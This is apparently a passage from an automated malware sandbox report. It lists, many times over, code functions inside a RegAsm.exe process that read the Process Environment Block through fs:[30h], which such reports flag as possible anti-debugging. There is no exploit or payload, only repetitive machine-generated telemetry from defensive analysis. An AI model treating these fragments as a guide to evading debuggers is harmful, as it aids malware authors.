                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA2C3 mov eax, dword ptr fs:[00000030h]3_2_02EEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA2C3 mov eax, dword ptr fs:[00000030h]3_2_02EEA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C0 mov eax, dword ptr fs:[00000030h]3_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB2D3 mov eax, dword ptr fs:[00000030h]3_2_02EDB2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB2D3 mov eax, dword ptr fs:[00000030h]3_2_02EDB2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB2D3 mov eax, dword ptr fs:[00000030h]3_2_02EDB2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F692BC mov eax, dword ptr fs:[00000030h]3_2_02F692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F692BC mov eax, dword ptr fs:[00000030h]3_2_02F692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F692BC mov ecx, dword ptr fs:[00000030h]3_2_02F692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F692BC mov ecx, dword ptr fs:[00000030h]3_2_02F692BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF02A0 mov eax, dword ptr fs:[00000030h]3_2_02EF02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF02A0 mov eax, dword ptr fs:[00000030h]3_2_02EF02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF52A0 mov eax, dword ptr fs:[00000030h]3_2_02EF52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF52A0 mov eax, dword ptr fs:[00000030h]3_2_02EF52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF52A0 mov eax, dword ptr fs:[00000030h]3_2_02EF52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF52A0 mov eax, dword ptr fs:[00000030h]3_2_02EF52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F762A0 mov eax, dword ptr fs:[00000030h]3_2_02F762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F762A0 mov ecx, dword ptr fs:[00000030h]3_2_02F762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F762A0 mov eax, dword ptr fs:[00000030h]3_2_02F762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F762A0 mov eax, dword ptr fs:[00000030h]3_2_02F762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F762A0 mov eax, dword ptr fs:[00000030h]3_2_02F762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F762A0 mov eax, dword ptr fs:[00000030h]3_2_02F762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F772A0 mov eax, dword ptr fs:[00000030h]3_2_02F772A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F772A0 mov eax, dword ptr fs:[00000030h]3_2_02F772A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA92A6 mov eax, dword ptr fs:[00000030h]3_2_02FA92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA92A6 mov eax, dword ptr fs:[00000030h]3_2_02FA92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA92A6 mov eax, dword ptr fs:[00000030h]3_2_02FA92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA92A6 mov eax, dword ptr fs:[00000030h]3_2_02FA92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1329E mov eax, dword ptr fs:[00000030h]3_2_02F1329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1329E mov eax, dword ptr fs:[00000030h]3_2_02F1329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F60283 mov eax, dword ptr fs:[00000030h]3_2_02F60283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F60283 mov eax, dword ptr fs:[00000030h]3_2_02F60283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F60283 mov eax, dword ptr fs:[00000030h]3_2_02F60283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1E284 mov eax, dword ptr fs:[00000030h]3_2_02F1E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1E284 mov eax, dword ptr fs:[00000030h]3_2_02F1E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB5283 mov eax, dword ptr fs:[00000030h]3_2_02FB5283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F21270 mov eax, dword ptr fs:[00000030h]3_2_02F21270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F21270 mov eax, dword ptr fs:[00000030h]3_2_02F21270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F09274 mov eax, dword ptr fs:[00000030h]3_2_02F09274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED826B mov eax, dword ptr fs:[00000030h]3_2_02ED826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90274 mov eax, dword ptr fs:[00000030h]3_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE4260 mov eax, dword ptr fs:[00000030h]3_2_02EE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE4260 mov eax, dword ptr fs:[00000030h]3_2_02EE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE4260 mov eax, dword ptr fs:[00000030h]3_2_02EE4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAD26B mov eax, dword ptr fs:[00000030h]3_2_02FAD26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAD26B mov eax, dword ptr fs:[00000030h]3_2_02FAD26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9240 mov eax, dword ptr fs:[00000030h]3_2_02ED9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9240 mov eax, dword ptr fs:[00000030h]3_2_02ED9240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9B256 mov eax, dword ptr fs:[00000030h]3_2_02F9B256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9B256 mov eax, dword ptr fs:[00000030h]3_2_02F9B256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F68243 mov eax, dword ptr fs:[00000030h]3_2_02F68243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F68243 mov ecx, dword ptr fs:[00000030h]3_2_02F68243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE6259 mov eax, dword ptr fs:[00000030h]3_2_02EE6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1724D mov eax, dword ptr fs:[00000030h]3_2_02F1724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDA250 mov eax, dword ptr fs:[00000030h]3_2_02EDA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED823B mov eax, dword ptr fs:[00000030h]3_2_02ED823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB5227 mov eax, dword ptr fs:[00000030h]3_2_02FB5227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F17208 mov eax, dword ptr fs:[00000030h]3_2_02F17208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F17208 mov eax, dword ptr fs:[00000030h]3_2_02F17208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF03E9 mov eax, dword ptr fs:[00000030h]3_2_02EF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB53FC mov eax, dword ptr fs:[00000030h]3_2_02FB53FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F163FF mov eax, dword ptr fs:[00000030h]3_2_02F163FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE3F0 mov eax, dword ptr fs:[00000030h]3_2_02EFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE3F0 mov eax, dword ptr fs:[00000030h]3_2_02EFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE3F0 mov eax, dword ptr fs:[00000030h]3_2_02EFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F3E6 mov eax, dword ptr fs:[00000030h]3_2_02F9F3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9B3D0 mov ecx, dword ptr fs:[00000030h]3_2_02F9B3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA3C0 mov eax, dword ptr fs:[00000030h]3_2_02EEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA3C0 mov eax, dword ptr fs:[00000030h]3_2_02EEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA3C0 mov eax, dword ptr fs:[00000030h]3_2_02EEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA3C0 mov eax, dword ptr fs:[00000030h]3_2_02EEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA3C0 mov eax, dword ptr fs:[00000030h]3_2_02EEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEA3C0 mov eax, dword ptr fs:[00000030h]3_2_02EEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE83C0 mov eax, dword ptr fs:[00000030h]3_2_02EE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE83C0 mov eax, dword ptr fs:[00000030h]3_2_02EE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE83C0 mov eax, dword ptr fs:[00000030h]3_2_02EE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE83C0 mov eax, dword ptr fs:[00000030h]3_2_02EE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9C3CD mov eax, dword ptr fs:[00000030h]3_2_02F9C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F663C0 mov eax, dword ptr fs:[00000030h]3_2_02F663C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F133A0 mov eax, dword ptr fs:[00000030h]3_2_02F133A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F133A0 mov eax, dword ptr fs:[00000030h]3_2_02F133A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F033A5 mov eax, dword ptr fs:[00000030h]3_2_02F033A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDE388 mov eax, dword ptr fs:[00000030h]3_2_02EDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDE388 mov eax, dword ptr fs:[00000030h]3_2_02EDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDE388 mov eax, dword ptr fs:[00000030h]3_2_02EDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB539D mov eax, dword ptr fs:[00000030h]3_2_02FB539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F3739A mov eax, dword ptr fs:[00000030h]3_2_02F3739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F3739A mov eax, dword ptr fs:[00000030h]3_2_02F3739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED8397 mov eax, dword ptr fs:[00000030h]3_2_02ED8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED8397 mov eax, dword ptr fs:[00000030h]3_2_02ED8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED8397 mov eax, dword ptr fs:[00000030h]3_2_02ED8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0438F mov eax, dword ptr fs:[00000030h]3_2_02F0438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0438F mov eax, dword ptr fs:[00000030h]3_2_02F0438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8437C mov eax, dword ptr fs:[00000030h]3_2_02F8437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F367 mov eax, dword ptr fs:[00000030h]3_2_02F9F367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE7370 mov eax, dword ptr fs:[00000030h]3_2_02EE7370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE7370 mov eax, dword ptr fs:[00000030h]3_2_02EE7370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE7370 mov eax, dword ptr fs:[00000030h]3_2_02EE7370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDD34C mov eax, dword ptr fs:[00000030h]3_2_02EDD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDD34C mov eax, dword ptr fs:[00000030h]3_2_02EDD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAA352 mov eax, dword ptr fs:[00000030h]3_2_02FAA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6035C mov eax, dword ptr fs:[00000030h]3_2_02F6035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6035C mov eax, dword ptr fs:[00000030h]3_2_02F6035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6035C mov eax, dword ptr fs:[00000030h]3_2_02F6035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6035C mov ecx, dword ptr fs:[00000030h]3_2_02F6035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6035C mov eax, dword ptr fs:[00000030h]3_2_02F6035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6035C mov eax, dword ptr fs:[00000030h]3_2_02F6035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB5341 mov eax, dword ptr fs:[00000030h]3_2_02FB5341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9353 mov eax, dword ptr fs:[00000030h]3_2_02ED9353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9353 mov eax, dword ptr fs:[00000030h]3_2_02ED9353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F62349 mov eax, dword ptr fs:[00000030h]3_2_02F62349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA132D mov eax, dword ptr fs:[00000030h]3_2_02FA132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA132D mov eax, dword ptr fs:[00000030h]3_2_02FA132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0F32A mov eax, dword ptr fs:[00000030h]3_2_02F0F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED7330 mov eax, dword ptr fs:[00000030h]3_2_02ED7330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F00310 mov ecx, dword ptr fs:[00000030h]3_2_02F00310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A30B mov eax, dword ptr fs:[00000030h]3_2_02F1A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A30B mov eax, dword ptr fs:[00000030h]3_2_02F1A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A30B mov eax, dword ptr fs:[00000030h]3_2_02F1A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDC310 mov ecx, dword ptr fs:[00000030h]3_2_02EDC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6930B mov eax, dword ptr fs:[00000030h]3_2_02F6930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6930B mov eax, dword ptr fs:[00000030h]3_2_02F6930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6930B mov eax, dword ptr fs:[00000030h]3_2_02F6930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F220F0 mov ecx, dword ptr fs:[00000030h]3_2_02F220F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE80E9 mov eax, dword ptr fs:[00000030h]3_2_02EE80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDA0E3 mov ecx, dword ptr fs:[00000030h]3_2_02EDA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F050E4 mov eax, dword ptr fs:[00000030h]3_2_02F050E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F050E4 mov ecx, dword ptr fs:[00000030h]3_2_02F050E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F660E0 mov eax, dword ptr fs:[00000030h]3_2_02F660E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDC0F0 mov eax, dword ptr fs:[00000030h]3_2_02EDC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB50D9 mov eax, dword ptr fs:[00000030h]3_2_02FB50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F620DE mov eax, dword ptr fs:[00000030h]3_2_02F620DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F090DB mov eax, dword ptr fs:[00000030h]3_2_02F090DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov ecx, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov ecx, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov ecx, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov ecx, dword ptr fs:[00000030h]3_2_02EF70C0
